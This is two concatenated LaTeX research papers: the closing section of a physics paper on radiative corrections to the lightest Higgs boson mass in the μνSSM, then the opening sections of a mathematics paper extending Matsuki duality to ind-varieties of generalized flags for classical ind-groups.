We also picture the lightest Higgs boson mass $m_h$ varying with the parameter $\kappa$ in Fig.~\ref{fig2}(a), where the solid line and dash-dot line denote $m_h$ and $m_{H_1}$ as $\tan\beta=20$, the dash line and dot line denote $m_h$ and $m_{H_1}$ as $\tan\beta=6$. And the quantity $\xi_h$ varies with the parameter $\kappa$ in Fig.~\ref{fig2}(b), where the solid line and dash line represent as $\tan\beta=20$ and $\tan\beta=6$, respectively. Here, we take $\lambda=0.1$, $A_\lambda=500\;{\rm GeV}$ and $\upsilon_{\nu^c}=2\;{\rm TeV}$. We can see that the lightest Higgs boson mass $m_h$ deviates from the mass $m_{H_1}$ largely, when the parameter $\kappa$ is small. Of course, for small $\kappa$, the quantity $\xi_h$ is large. Constrained by the Landau pole condition~\cite{mnSSM1}, we choose the parameter $\kappa\leq0.6$.
\begin{figure}
\setlength{\unitlength}{1mm}
\centering
\begin{minipage}[c]{0.45\textwidth}
\includegraphics[width=2.9in]{fig3A-a.eps}
\end{minipage}%
\begin{minipage}[c]{0.45\textwidth}
\includegraphics[width=2.9in]{fig3A-b.eps}
\end{minipage}
\caption[]{(a) $m_h$ varies with $A_\lambda$, the solid line and dash-dot line denote $m_h$ and $m_{H_1}$ as $\tan\beta=20$, the dash line and dot line denote $m_h$ and $m_{H_1}$ as $\tan\beta=6$. (b) $\xi_h$ varies with $A_\lambda$, the solid line and dash line represent as $\tan\beta=20$ and $\tan\beta=6$, respectively. When $\kappa=0.4$, $\lambda=0.1$ and $\upsilon_{\nu^c}=2\;{\rm TeV}$.}
\label{fig3}
\end{figure}
In Fig.~\ref{fig3}(a), for $\kappa=0.4$, $\lambda=0.1$ and $\upsilon_{\nu^c}=2\;{\rm TeV}$, we draw the lightest Higgs boson mass $m_h$, varying with the parameter $A_\lambda$, where the solid line and dash-dot line denote $m_h$ and $m_{H_1}$ as $\tan\beta=20$, the dash line and dot line denote $m_h$ and $m_{H_1}$ as $\tan\beta=6$. And Fig.~\ref{fig3}(b) shows the quantity $\xi_h$ versus $A_\lambda$, where the solid line and dash line represent as $\tan\beta=20$ and $\tan\beta=6$, respectively. The numerical results show that $m_h\simeq m_{H_1}$ and $\xi_h\simeq 0$ as $A_\lambda\approx 2\;{\rm TeV}$ for $\tan\beta=6$, and as $A_\lambda\approx 10\;{\rm TeV}$ for $\tan\beta=20$, which is in accordance with Eq.~(\ref{Alambda}). Comparing with the large tree-level contributions, the small one-loop contributions can be ignored, then Eq.~(\ref{Alambda}) can be approximated as
\begin{eqnarray}
A_\lambda \simeq 2\upsilon_{\nu^c} \Big( \frac{3\lambda}{\sin2\beta} - \kappa \Big) \,.
\label{Alambda1}
\end{eqnarray}
Therefore, when $A_\lambda$ is around $ 2\upsilon_{\nu^c} \Big( {3\lambda}/{\sin2\beta} - \kappa \Big)$, we could regard the lightest Higgs boson mass as $m_h \approx m_{H_1}$. If $A_\lambda$ drifts off the value of $ 2\upsilon_{\nu^c} \Big( {3\lambda}/{\sin2\beta} - \kappa \Big)$ significantly, the lightest Higgs boson mass $m_h$ will deviate from the mass $m_{H_1}$.
\begin{figure}
\setlength{\unitlength}{1mm}
\centering
\begin{minipage}[c]{0.45\textwidth}
\includegraphics[width=2.9in]{fig4vc-a.eps}
\end{minipage}%
\begin{minipage}[c]{0.45\textwidth}
\includegraphics[width=2.9in]{fig4vc-b.eps}
\end{minipage}
\caption[]{(a) $m_h$ varies with $\upsilon_{\nu^c}$, the solid line and dash-dot line denote $m_h$ and $m_{H_1}$ as $\tan\beta=20$, the dash line and dot line denote $m_h$ and $m_{H_1}$ as $\tan\beta=6$. (b) $\xi_h$ varies with $\upsilon_{\nu^c}$, the solid line and dash line represent as $\tan\beta=20$ and $\tan\beta=6$, respectively. When $\kappa=0.4$, $\lambda=0.1$ and $A_\lambda=500\;{\rm GeV}$.}
\label{fig4}
\end{figure}
Finally, for $\kappa=0.4$, $\lambda=0.1$, and $A_\lambda=500\;{\rm GeV}$, we plot the lightest Higgs boson mass $m_h$ versus the parameter $\upsilon_{\nu^c}$ in Fig.~\ref{fig4}(a), where the solid line and dash-dot line denote $m_h$ and $m_{H_1}$ as $\tan\beta=20$, and the dash line and dot line denote $m_h$ and $m_{H_1}$ as $\tan\beta=6$. Fig.~\ref{fig4}(b) shows $\xi_h$ varying with $\upsilon_{\nu^c}$, where the solid line and dash line represent as $\tan\beta=20$ and $\tan\beta=6$, respectively. We can see that the lightest Higgs boson mass $m_h$ is parallel to the mass $m_{H_1}$ with increasing of $\upsilon_{\nu^c}$. Through Eq.~(\ref{mR1}), $m_{R_1}^2 \sim \mathcal{O}(\upsilon_{\nu^c}^2)$, and $A_{X_1}^2 \sim \mathcal{O}(\upsilon_{\nu^c})$ as shown in Eq.~(\ref{AX1}). Therefore, the quantity $\xi_h = \frac{(A_{X_1}^2)^2}{m_{R_1}^2 m_{H_1}^2}$ defined in Eq.~(\ref{xih}) becomes flat with an increase of $\upsilon_{\nu^c}$, which can be seen in Fig.~\ref{fig4}(b). In addition, Fig.~\ref{fig4}(a) indicates that $m_h$ and $m_{H_1}$ are decreasing slowly, with an increase of $\upsilon_{\nu^c}$, because the parameter $\mu=3\lambda\upsilon_{\nu^c}$, which can affect the radiative corrections for the lightest Higgs boson mass.
\section{Summary\label{sec-sum}}
\indent
In the framework of the $\mu\nu$SSM, the three singlet right-handed neutrino superfields $\hat{\nu}_i^c$ are introduced to solve the $\mu$ problem of the MSSM. Correspondingly, the right-handed sneutrino VEVs lead to the mixing of the neutral components of the Higgs doublets with the sneutrinos, which produce a large CP-even neutral scalar mass matrix. Therefore, the mixing would affect the lightest Higgs boson mass. In this work, we consider the Higgs boson mass radiative corrections with effective potential methods and then analytically diagonalize the CP-even neutral scalar mass matrix. Meanwhile, in the large $m_A$ limit, we give an approximate expression for the lightest Higgs boson mass seen in Eq.~(\ref{mh-app}). In numerical analysis, we analyze how the key parameters $\lambda,\,\tan\beta,\,\kappa,\,A_\lambda$, and $\upsilon_{\nu^c}$ affect the lightest Higgs boson mass.
\begin{acknowledgments}
\indent
The work has been supported by the National Natural Science Foundation of China (NNSFC)
with Grants No. 11535002, No. 11605037 and No. 11647120,
Natural Science Foundation of Hebei province with Grants No. A2016201010 and No. A2016201069,
Foundation of Department of Education of Liaoning province with Grant No. 2016TSPY10,
Youth Foundation of the University of Science and Technology Liaoning with Grant No. 2016QN11,
Hebei Key Lab of Optic-Eletronic Information and Materials,
and the Midwest Universities Comprehensive Strength Promotion project.
\end{acknowledgments}
| 2024-02-18T23:40:16.811Z | 2017-04-12T02:10:10.000Z | algebraic_stack_train_0000 | 1,917 | 6,826 |
|
proofpile-arXiv_065-9423 | \section{Introduction}
\label{S.intro}
In this paper we extend Matsuki duality to ind-varieties of maximal generalized flags, i.e., to homogeneous ind-spaces of the form $\mathbf{G}/\mathbf{B}$ for $\mathbf{G}=\mathrm{GL}(\infty)$, $\mathrm{SL}(\infty)$, $\mathrm{SO}(\infty)$, $\mathrm{Sp}(\infty)$. In the case of a finite-dimensional reductive algebraic group $G$, Matsuki duality \cite{Gindikin-Matsuki, Matsuki, Matsuki3} is a bijection between the (finite) set of $K$-orbits on $G/B$ and the set of $G^0$-orbits on $G/B$, where $K$ is a symmetric subgroup of $G$ and $G^0$ is a real form of $G$. Moreover, this bijection reverses the inclusion relation between orbit closures. In particular, the remarkable theorem about the uniqueness of a closed $G^0$-orbit on $G/B$, see \cite{W1}, follows via Matsuki duality from the uniqueness of a (Zariski) open $K$-orbit on $G/B$.
In the monograph \cite{FHW}, Matsuki duality has been used as the starting point in a study of cycle spaces.
If $\mathbf{G}=\mathrm{GL}(\infty)$, $\mathrm{SL}(\infty)$, $\mathrm{SO}(\infty)$, $\mathrm{Sp}(\infty)$ is a classical ind-group, then its Borel ind-subgroups are neither $\mathbf{G}$-conjugate nor $\mathrm{Aut}(\mathbf{G})$-conjugate, hence there are many ind-varieties of the form $\mathbf{G}/\mathbf{B}$. We show that Matsuki duality extends to any ind-variety $\mathbf{G}/\mathbf{B}$ where $\mathbf{B}$ is a splitting Borel ind-subgroup of $\mathbf{G}$ for $\mathbf{G}=\mathrm{GL}(\infty)$, $\mathrm{SL}(\infty)$, $\mathrm{SO}(\infty)$, $\mathrm{Sp}(\infty)$. In the infinite-dimensional case, the structure of $\mathbf{G}^0$-orbits and $\mathbf{K}$-orbits on $\mathbf{G}/\mathbf{B}$ is more complicated than in the finite-dimensional case, and there are always infinitely many orbits.
A first study of the $\mathbf{G}^0$-orbits on $\mathbf{G}/\mathbf{B}$ for $\mathbf{G}=\mathrm{GL}(\infty),\mathrm{SL}(\infty)$ was done in~\cite{Ignatyev-Penkov-Wolf} and was continued in~\cite{W}. In particular, in \cite{Ignatyev-Penkov-Wolf} it was shown that, for some real forms $\mathbf{G}^0$, there are splitting Borel ind-subgroups $\mathbf{B}\subset \mathbf{G}$ such that $\mathbf{G}/\mathbf{B}$ has neither an open nor a closed $\mathbf{G}^0$-orbit.
We know of no prior studies of the structure of $\mathbf{K}$-orbits on $\mathbf{G}/\mathbf{B}$ of $\mathbf{G}=\mathrm{GL}(\infty),\mathrm{SL}(\infty),\mathrm{SO}(\infty),\mathrm{Sp}(\infty)$. The duality we establish in this paper shows that the structure of $\mathbf{K}$-orbits on $\mathbf{G}/\mathbf{B}$ is a ``mirror image'' of the structure of $\mathbf{G}^0$-orbits on $\mathbf{G}/\mathbf{B}$. In particular, the fact that $\mathbf{G}/\mathbf{B}$ admits at most one closed $\mathbf{G}^0$-orbit is now a corollary of the obvious statement that $\mathbf{G}/\mathbf{B}$ admits at most one Zariski-open $\mathbf{K}$-orbit.
Our main result can be stated as follows.
Let $(\mathbf{G},\mathbf{K},\mathbf{G}^0)$ be one of the triples
listed in Section \ref{S2.1}
consisting of
a classical (complex) ind-group $\mathbf{G}$, a symmetric ind-subgroup $\mathbf{K}\subset\mathbf{G}$,
and the corresponding real form $\mathbf{G}^0\subset\mathbf{G}$.
Let $\mathbf{B}\subset\mathbf{G}$ be a splitting Borel ind-subgroup
such that $\mathbf{X}:=\mathbf{G}/\mathbf{B}$ is
an ind-variety of maximal generalized flags (isotropic, in types B, C, D)
weakly compatible with a basis adapted to
the choice of $\mathbf{K}$, $\mathbf{G}^0$ in the sense of Sections \ref{S2.1}, \ref{S2.3}.
There are natural exhaustions $\mathbf{G}=\bigcup_{n\geq 1}G_n$
and $\mathbf{X}=\bigcup_{n\geq 1}X_n$.
Here $G_n$ is a finite-dimensional algebraic group,
$X_n$ is the full flag variety of $G_n$,
and the inclusion $X_n\subset\mathbf{X}$ is in particular $G_n$-equivariant.
Moreover $K_n:=\mathbf{K}\cap G_n$ and $G^0_n:=\mathbf{G}^0\cap G_n$
are respectively a symmetric subgroup and the corresponding real form of $G_n$.
See Section \ref{S4.4} for more details.
\begin{theorem}
\label{theorem-1}
\begin{itemize}
\item[\rm (a)] For every $n\geq 1$ the inclusion $X_n\subset \mathbf{X}$
induces embeddings of orbit sets $X_n/K_n\hookrightarrow \mathbf{X}/\mathbf{K}$
and $X_n/G^0_n\hookrightarrow \mathbf{X}/\mathbf{G}^0$.
\item[\rm (b)] There is a bijection $\Xi:\mathbf{X}/\mathbf{K}\to\mathbf{X}/\mathbf{G}^0$
such that the diagram
\[
\xymatrix{
X_n/K_n \ar@{->}[d]^{\Xi_n} \ar@{^{(}->}[r] & \mathbf{X}/\mathbf{K} \ar@{->}[d]^{\Xi} \\
X_n/G^0_n \ar@{^{(}->}[r] & \mathbf{X}/\mathbf{G}^0
}
\]
is commutative, where $\Xi_n$ stands for Matsuki duality.
\item[\rm (c)] For every $\mathbf{K}$-orbit $\bs{\mathcal{O}}\subset\mathbf{X}$
the intersection $\bs{\mathcal{O}}\cap\Xi(\bs{\mathcal{O}})$ consists of a single $\mathbf{K}\cap\mathbf{G}^0$-orbit.
\item[\rm (d)] The bijection $\Xi$ reverses the inclusion relation of orbit closures.
In particular $\Xi$ maps open (resp., closed) $\mathbf{K}$-orbits to
closed (resp., open) $\mathbf{G}^0$-orbits.
\end{itemize}
\end{theorem}
Actually our results are much more precise: in Propositions \ref{P4-1.1}, \ref{P4.2-2}, \ref{P4.3} we show that $\mathbf{X}/\mathbf{K}$ and $\mathbf{X}/\mathbf{G}^0$ admit the same explicit parametrization which is nothing but the inductive limit of suitable joint parametrizations of $X_n/K_n$ and $X_n/G_n^0$. This yields the bijection $\Xi$ of Theorem \ref{theorem-1}\,{\rm (b)}. Parts {\rm (a)} and {\rm (b)} of Theorem \ref{theorem-1} are
implied by our claims (\ref{T-proof.1}), (\ref{T-proof.2}), (\ref{T-proof.3}) below. Theorem \ref{theorem-1}\,{\rm (c)} follows from the corresponding statements in Propositions \ref{P4-1.1}, \ref{P4.2-2}, \ref{P4.3}.
Finally, Theorem \ref{theorem-1}\,{\rm (d)} is implied by
Theorem \ref{theorem-1}\,{\rm (a)}--{\rm (b)}, the definition of the ind-topology,
and the fact that the duality $\Xi_n$ reverses the inclusion relation between orbit closures.
\subsection*{Organization of the paper}
In Section \ref{S2} we introduce the notation for classical ind-groups, symmetric ind-subgroups, and real forms.
We recall some basic facts on finite-dimensional flag varieties, as well as the notion of ind-variety of generalized flags \cite{Dimitrov-Penkov,Ignatyev-Penkov}.
In Section \ref{S3} we give
the joint parametrization of $K$- and $G^0$-orbits in a finite-dimensional flag variety.
This parametrization should be known in principle (see \cite{MO,Y})
but we have not found a reference where it would appear exactly as we present it. For the sake of completeness we provide full proofs of these results.
In
Section \ref{S4} we state our main results on the parametrization of $\mathbf{K}$- and $\mathbf{G}^0$-orbits in ind-varieties of generalized flags. Theorem \ref{theorem-1} above is a consequence of these results.
In Section \ref{S5} we point out some further corollaries of our main results.
In what follows $\mathbb{N}^*$ stands for the set of positive integers.
$|A|$ stands for the cardinality of a set $A$. The symmetric group on $n$ letters is denoted by $\mathfrak{S}_n$ and $\mathfrak{S}_\infty=\lim\limits_{\longrightarrow}\,\mathfrak{S}_n$ stands for the infinite symmetric group.
Often we write $w_k$ for the image $w(k)$ of $k$ by a permutation $w$.
By $(k;\ell)$ we denote the transposition that switches $k$ and $\ell$.
We use boldface letters to denote ind-varieties.
An index of notation can be found at the end of the paper.
\subsection*{Acknowledgement}
We thank Alan Huckleberry and Mikhail Ignatyev for their encouragement to study Matsuki duality. The first author was supported in part by ISF Grant Nr. 797/14 and by ANR project GeoLie (ANR-15-CE40-0012). The second author was supported in part by DFG Grant PE 980/6-1.
\section{Notation and preliminary facts}
\label{S2}
\subsection{Classical groups and classical ind-groups}
\label{S2.1}
Let $\mathbf{V}$ be a complex vector space of countable dimension, with a basis
$E=(e_1,e_2,\ldots)=(e_\ell)_{\ell\in \mathbb{N}^*}$.
Every vector $x\in\mathbf{V}$ is identified with the column of its coordinates in the basis $E$,
and $x\mapsto \overline{x}$ stands for complex conjugation with respect to $E$.
We also consider the finite dimensional subspace $V=V_n:=\langle e_1,\ldots,e_n\rangle_\mathbb{C}$ of $\mathrm{V}$.
The classical ind-group $\mathrm{GL}(\infty)$ is defined as
\[\mathrm{GL}(\infty)=\mathbf{G}(E):=\{g\in\mathrm{Aut}(\mathbf{V}):g(e_\ell)=e_\ell\mbox{ for all $\ell\gg 1$}\}=\bigcup_{n\geq 1}\mathrm{GL}(V_n).\]
The real forms of $\mathrm{GL}(\infty)$ are well known and can be traced back to the work of Baranov~\cite{Baranov}. Below we list aligned pairs $(\mathbf{K},\mathbf{G}^0)$, where $\textbf{G}^0$ is a real form of $\mathbf{G}$ and $\mathbf{K}\subset\mathbf{G}$ is a symmetric ind-subgroup of $\mathbf{G}$. The pairs $\left(\mathbf{K},\mathbf{G}^0\right)$ we consider are aligned in the following way: there exists an exhaustion of $\mathbf{G}$ as a union $\bigcup_n\,\mathrm{GL}\left(V_n\right)$ such that $K_n:=\mathbf{K}\cap\mathrm{GL}\left(V_n\right)$ is a symmetric subgroup of $\mathrm{GL}\left(V_n\right)$, $G_0^n:=\mathbf{G}^0\cap\mathrm{GL}\left(V_n\right)$ is a real form of $\mathrm{GL}\left(V_n\right)$, and $K_n\cap G_n^0$ is a maximal compact subgroup of $G_n^0$.
\subsubsection{Types A1 and A2}
\label{S:A1A2}
Let $\Omega$ be a $\mathbb{N}^*\times\mathbb{N}^*$-matrix of the form
\begin{equation}
\label{omega}
\Omega=\left(
\begin{array}{cccc}
J_1 & & (0) \\
& J_2 \\
(0) & & \ddots
\end{array}
\right)\
\mbox{where}\
\left\{
\begin{array}{ll}
J_k\in\left\{\left(\begin{matrix} 0 & 1 \\ 1 & 0 \end{matrix}\right),\left(1\right)\right\}
& \parbox{2.6cm}{(orthogonal case, \\ type A1),} \\[4mm]
J_k=\left(\begin{matrix} 0 & 1 \\ -1 & 0 \end{matrix}\right) & \parbox{2.6cm}{(symplectic case, \\ type A2).}
\end{array}
\right.
\end{equation}
The bilinear form
\[\omega(x,y):={}^tx\Omega y\quad (x,y\in \mathbf{V})\]
is symmetric in type A1 and symplectic in type A2, whereas the map
\[\gamma(x):=\Omega\overline{x}\quad (x\in \mathbf{V})\]
is an involution of $\mathbf{V}$ in type A1 and an antiinvolution in type A2.
Let
\begin{eqnarray*}
& & \mathbf{K}=\mathbf{G}(E,\omega):=\{g\in \mathbf{G}(E):\omega(gx,gy)=\omega(x,y)\ \forall x,y\in\mathbf{V}\} \\[1mm]
& \mbox{and} & \mathbf{G}^0:=\{g\in \mathbf{G}(E):\gamma(gx)=g\gamma(x)\ \forall x\in\mathbf{V}\}.
\end{eqnarray*}
\subsubsection{Type A3}
\label{S:A3}
Fix a (proper) decomposition $\mathbb{N}^*=N_+\sqcup N_-$ and let
\begin{equation}
\label{phi}
\Phi=\left(
\begin{array}{cccc}
\epsilon_1 & & (0) \\
& \epsilon_2 \\
(0) & & \ddots
\end{array}
\right)
\end{equation}
where $\epsilon_\ell=1$ for $\ell\in N_+$ and $\epsilon_\ell=-1$ for $\ell\in N_-$.
Thus
\[\phi(x,y):={}^t\overline{x} \Phi y\quad(x,y\in\mathbf{V})\]
is a Hermitian form of signature $(|N_+|,|N_-|)$ and
\[\delta(x):=\Phi x\quad(x\in\mathbf{V})\]
is an involution. Finally let
\[
\mathbf{K}:=\{g\in \mathbf{G}(E):\delta(gx)=g\delta(x)\ \forall
x\in\mathbf{V}\}
\]
and
\[
\mathbf{G}^0:=\{g\in \mathbf{G}(E):\phi(gx,gy)=\phi(x,y)\ \forall
x,y\in\mathbf{V}\}.
\]
\subsection*{Types B, C, D}
Next we describe pairs $(\mathbf{K},\mathbf{G}^0)$ associated to
the other classical ind-groups $\mathrm{SO}(\infty)$ and $\mathrm{Sp}(\infty)$. Let $\mathbf{G}=\mathbf{G}(E,\omega)$
where $\omega$ is a (symmetric or symplectic) bilinear form given by a matrix $\Omega$ as in (\ref{omega}).
In view of (\ref{omega}), for every $\ell\in\mathbb{N}^*$ there is a unique $\ell^*\in\mathbb{N}^*$ such that
\[\omega(e_\ell,e_{\ell^*})\not=0.\]
Moreover $\ell^*\in\{\ell-1,\ell,\ell+1\}$. The map $\ell\mapsto\ell^*$ is an involution of $\mathbb{N}^*$.
\subsubsection{Types BD1 and C2}
\label{S:BD1C2}
Assume that $\omega$ is symmetric in type BD1 and symplectic in type C2.
Fix a (proper) decomposition $\mathbb{N}^*=N_+\sqcup N_-$ such that
\[\forall \ell\in\mathbb{N}^*,\ \ell\in N_+\Leftrightarrow \ell^*\in N_+\]
and the restriction of $\omega$ on each of the subspaces $\mathbf{V}_+:=\langle e_\ell:\ell\in N_+\rangle_\mathbb{C}$ and
$\mathbf{V}_-:=\langle e_\ell:\ell\in N_-\rangle_\mathbb{C}$ is nondegenerate.
Let $\Phi,\phi,\delta$ be as in Section~\ref{S:A3}. Then we set
\begin{eqnarray}
\label{N1}
\mathbf{K}:=\{g\in \mathbf{G}(E,\omega):\delta(gx)=g\delta(x)\ \forall
x\in\mathbf{V}\}
\end{eqnarray}
and
\begin{eqnarray}
\label{N2}
\mathbf{G}^0:=\{g\in \mathbf{G}(E,\omega):\phi(gx,gy)=\phi(x,y)\ \forall
x,y\in\mathbf{V}\}.
\end{eqnarray}
\subsubsection{Types C1 and D3}
\label{S:C1D3}
Assume that $\omega$ is symmetric in type D3 and symplectic in type C1.
Fix a decomposition $\mathbb{N}^*=N_+\sqcup N_-$ satisfying
\[
\forall \ell\in\mathbb{N}^*,\ \ell\in N_+\Leftrightarrow \ell^*\in N_-.
\]
Note that this forces every block $J_k$ in (\ref{omega}) to be of size $2$.
In this situation $\mathbf{V}_+:=\langle e_\ell:\ell\in N_+\rangle_\mathbb{C}$ and $\mathbf{V}_-:=\langle e_\ell:\ell\in N_-\rangle_\mathbb{C}$
are maximal isotropic subspaces for the form $\omega$.
Let $\Phi,\phi,\delta$ be as in Section~\ref{S:A3}. Finally, we define the ind-subgroups $\mathbf{K},\mathbf{G}^0\subset\mathbf{G}$ as in (\ref{N1}), (\ref{N2}).
\subsection*{Finite-dimensional case}
The following table summarizes the form of the intersections $G=\textbf{G}\cap\mathrm{GL}\left(V_n\right)$, $K=\textbf{K}\cap\mathrm{GL}\left(V_n\right)$, $G^0=\textbf{G}^0\cap\mathrm{GL}\left(V_n\right)$, where $n=2m$ is even whenever we are in types A2, C1, C2, and D3.
In types A3, BD1, and C2, we set $(p,q)=(|N_+\cap\{1,\ldots,n\}|,|N_-\cap\{1,\ldots,n\}|)$.
By $\mathbb{H}$ we denote the skew field of quaternions.
In this way we retrieve the classical finite-dimensional symmetric pairs and real forms
(see, e.g., \cite{Berger,OV,Otha1}).
\begin{center}
\renewcommand{\arraystretch}{1.25}
\begin{tabular}{|c|c|c|c|}
\hline
type & $G:=\mathbf{G}\cap\mathrm{GL}\left(V_n\right)$ & $K:=\mathbf{K}\cap\mathrm{GL}\left(V_n\right)$ & $G^0:=\mathbf{G}^0\cap\mathrm{GL}\left(V_n\right)$ \\
\hline
A1 & & $\mathrm{O}_n(\mathbb{C})$ & $\mathrm{GL}_n(\mathbb{R})$ \\
A2 & $\mathrm{GL}_n(\mathbb{C})$ & $\mathrm{Sp}_n(\mathbb{C})$ & $\mathrm{GL}_m(\mathbb{H})$ \\
A3 & & $\mathrm{GL}_p(\mathbb{C})\times\mathrm{GL}_q(\mathbb{C})$ & $\mathrm{U}_{p,q}(\mathbb{C})$ \\
\hline
BD1 & $\mathrm{O}_n(\mathbb{C})$ & $\mathrm{O}_p(\mathbb{C})\times\mathrm{O}_q(\mathbb{C})$ & $\mathrm{O}_{p,q}(\mathbb{C})$ \\
\hline
C1 & ${}_{{}_{\mbox{$\mathrm{Sp}_n(\mathbb{C})$}}}$ & $\mathrm{GL}_m(\mathbb{C})$ & $\mathrm{Sp}_n(\mathbb{R})$ \\[-1.5mm]
C2 & & $\mathrm{Sp}_p(\mathbb{C})\times\mathrm{Sp}_q(\mathbb{C})$ & $\mathrm{Sp}_{p,q}(\mathbb{C})$ \\
\hline
D3 & $\mathrm{O}_n(\mathbb{C})=\mathrm{O}_{2m}(\mathbb{C})$ & $\mathrm{GL}_m(\mathbb{C})$ & $\mathrm{O}^*_n(\mathbb{C})$ \\
\hline
\end{tabular}
\end{center}
In each case $G^0$ is a real form obtained from $K$ so that $K\cap G^0$ is a maximal compact subgroup of $G^0$.
Conversely $K$ is obtained from $G^0$ as the complexification of a maximal compact subgroup.
\subsection{Finite-dimensional flag varieties}
\label{S2.2}
Recall that $V=V_n$.
The flag variety $X:=\mathrm{GL}(V)/B=\{gB:g\in \mathrm{GL}(V)\}$ (for a Borel subgroup $B\subset \mathrm{GL}(V)$)
can as well be viewed as the set of Borel subgroups $\{gBg^{-1}:g\in \mathrm{GL}(V)\}$
or as the set of complete flags
\begin{equation}
\label{2.2.X}
\big\{\mathcal{F}=(F_0\subset F_1\subset\ldots\subset F_n=V): \dim F_k=k\ \mbox{ for all $k$}\big\}.
\end{equation}
For every complete flag $\mathcal{F}$ let $B_\mathcal{F}:=\{g\in \mathrm{GL}(V):g\mathcal{F}=\mathcal{F}\}$ denote the corresponding Borel subgroup.
When $(v_1,\ldots,v_n)$ is a basis of $V$ we write
\[\mathcal{F}(v_1,\ldots,v_n):=\big(0\subset\langle v_1\rangle_\mathbb{C}\subset\langle v_1,v_2\rangle_\mathbb{C}\subset\ldots\subset\langle v_1,\ldots,v_n\rangle_\mathbb{C}\big)\in X.\]
\medskip
\paragraph{{\bf Bruhat decomposition}}
The double flag variety $X\times X$ has a finite number
of $\mathrm{GL}(V)$-orbits parametrized by permutations $w\in\mathfrak{S}_n$.
Specifically, given two flags $\mathcal{F}=(F_k)_{k=0}^n$ and
$\mathcal{F}'=(F'_\ell)_{\ell=0}^n$ there is a unique permutation
$w=:w(\mathcal{F},\mathcal{F}')$ such that
\[\dim F_k\cap F'_\ell=\big|\big\{j\in\{1,\ldots,\ell\}:w_j\in\{1,\ldots,k\}\big\}\big|.\]
The permutation $w(\mathcal{F},\mathcal{F}')$ is called the relative position of $(\mathcal{F},\mathcal{F}')\in X\times X$.
Then
\[X\times X=\bigsqcup_{w\in\mathfrak{S}_n}\mathbb{O}_w
\quad\mbox{where $\mathbb{O}_w:=\big\{(\mathcal{F},\mathcal{F}')\in X\times X:w(\mathcal{F},\mathcal{F}')=w\big\}$}\]
is the decomposition of $X\times X$ into $\mathrm{GL}(V)$-orbits.
The unique closed orbit is $\mathbb{O}_{\mathrm{id}}$ and the unique open
orbit is $\mathbb{O}_{w_0}$ where $w_0$ is the involution given by
$w_0(k)=n-k+1$ for all $k$. The map
$\mathbb{O}_w\mapsto\mathbb{O}_{w_0w}$ is an involution on the set
of orbits and reverses inclusions between orbit closures.
Representatives of $\mathbb{O}_w$ can be obtained as follows:
for every basis $(v_1,\ldots,v_n)$ of $V$ we have
\[\big(\mathcal{F}(v_1,\ldots,v_n),\mathcal{F}(v_{w_1},\ldots,v_{w_n})\big)\in\mathbb{O}_w.\]
\medskip
\paragraph{{\bf Variety of isotropic flags}} Let $V$ be endowed with a nondegenerate symmetric or symplectic bilinear form $\omega$.
For a subspace $F\subset V$, set $F^\perp=\{x\in V:\omega(x,y)=0\ \forall y\in F\}$.
The variety of isotropic flags is the subvariety $X_\omega$ of $X$, where
\begin{equation}
\label{2.2.Xomega}
X_\omega=\{\mathcal{F}=(F_k)_{k=0}^n\in X:F_k^\perp=F_{n-k}\ \forall k=0,\ldots,n\}.
\end{equation}
It is endowed with a transitive action of the subgroup
$G(V,\omega)\subset\mathrm{GL}(V)$ of automorphisms preserving $\omega$.
\begin{lemma}
\label{lemma-2.2.1}
{\rm (a)}
For every endomorphism $f\in\mathrm{End}(V)$, let $f^*\in\mathrm{End}(V)$ denote the endomorphism adjoint to $f$ with respect to $\omega$.
Let $H\subset \mathrm{GL}(V)$ be a subgroup satisfying the condition
\begin{equation}
\label{2.2.1}
\mathbb{C}[g^*g]\cap\mathrm{GL}(V)\subset H\ \mbox{ for all $g\in H$}.
\end{equation}
Assume that $\mathcal{F}\in X_\omega$ and $\mathcal{F}'\in X_\omega$ belong to the same $H$-orbit of $X$. Then they belong to the same $H\cap G(V,\omega)$-orbit of $X_\omega$. \\
{\rm (b)} Let $H=\{g\in \mathrm{GL}(V):g(V_+)=V_+,\ g(V_-)=V_-\}$ where $V=V_+\oplus V_-$ is a decomposition such that
$(V_+^\perp,V_-^\perp)=(V_+,V_-)$ or $(V_-,V_+)$.
Then (\ref{2.2.1}) is fulfilled.
\end{lemma}
\begin{proof}
{\rm (a)}
Note that $G(V,\omega)=\{g\in\mathrm{GL}(V):g^*=g^{-1}\}$.
Consider $g\in H$ such that $\mathcal{F}'=g\mathcal{F}$.
The equality $(gF)^\perp=(g^*)^{-1}F^\perp$ holds for all subspaces $F\subset V$.
Since $\mathcal{F},\mathcal{F}'$ belong to $X_\omega$ we have $\mathcal{F}'=(g^*)^{-1}\mathcal{F}$,
hence $g^*g\mathcal{F}=\mathcal{F}$.
Let $g_1=g^*g$.
By \cite[Lemma 1.5]{Jantzen} there is a polynomial $P(t)\in\mathbb{C}[t]$ such that
$P(g_1)^2=g_1$. Set $h=P(g_1)$.
Then $h\in\mathrm{GL}(V)$ (since $h^2=g_1\in\mathrm{GL}(V)$), and (\ref{2.2.1}) shows that actually $h\in H$.
Moreover $h^*=h$ (since $h\in\mathbb{C}[g_1]$ and $g_1^*=g_1$)
and $h\mathcal{F}=\mathcal{F}$ (as each subspace in $\mathcal{F}$ is $g_1$-stable hence also $h$-stable).
Set $h_1:=gh^{-1}\in H$.
Then, on the one hand,
\[h_1^*=(h^*)^{-1}g^*=h^{-1}g_1g^{-1}=h^{-1}h^2g^{-1}=hg^{-1}=h_1^{-1}\,.\]
Thus $h_1\in H\cap G(V,\omega)$,
and on the other hand,
$h_1\mathcal{F}=gh^{-1}\mathcal{F}=g\mathcal{F}=\mathcal{F}'$. \\
{\rm (b)}
The equality $g^*(gF)^\perp=F^\perp$ (already mentioned) applied to $F=V_\pm$ yields $g^*\in H$, and thus $g^*g\in H$, whenever $g\in H$. This implies (\ref{2.2.1}).
\end{proof}
\begin{remark}
The proof of Lemma \ref{lemma-2.2.1}\,{\rm (a)} is inspired by \cite[\S1.4]{Jantzen}. We also refer to \cite{Nishiyama, Otha} for similar results and generalizations.
\end{remark}
\subsection{Ind-varieties of generalized flags}
\label{S2.3}
Recall that $\mathbf{V}$ denotes a complex vector space of countable dimension,
with a basis $E=(e_\ell)_{\ell\in\mathbb{N}^*}$.
\begin{definition}[\cite{Dimitrov-Penkov}]
Let $\mathcal{F}$ be a chain of subspaces in $\mathbf{V}$, i.e., a set of subspaces of $\mathbf{V}$ which is totally ordered by inclusion. Let $\mathcal{F}'$ (resp., $\mathcal{F}''$) be the subchain consisting of all $F\in\mathcal{F}$ with an immediate successor (resp., an immediate predecessor).
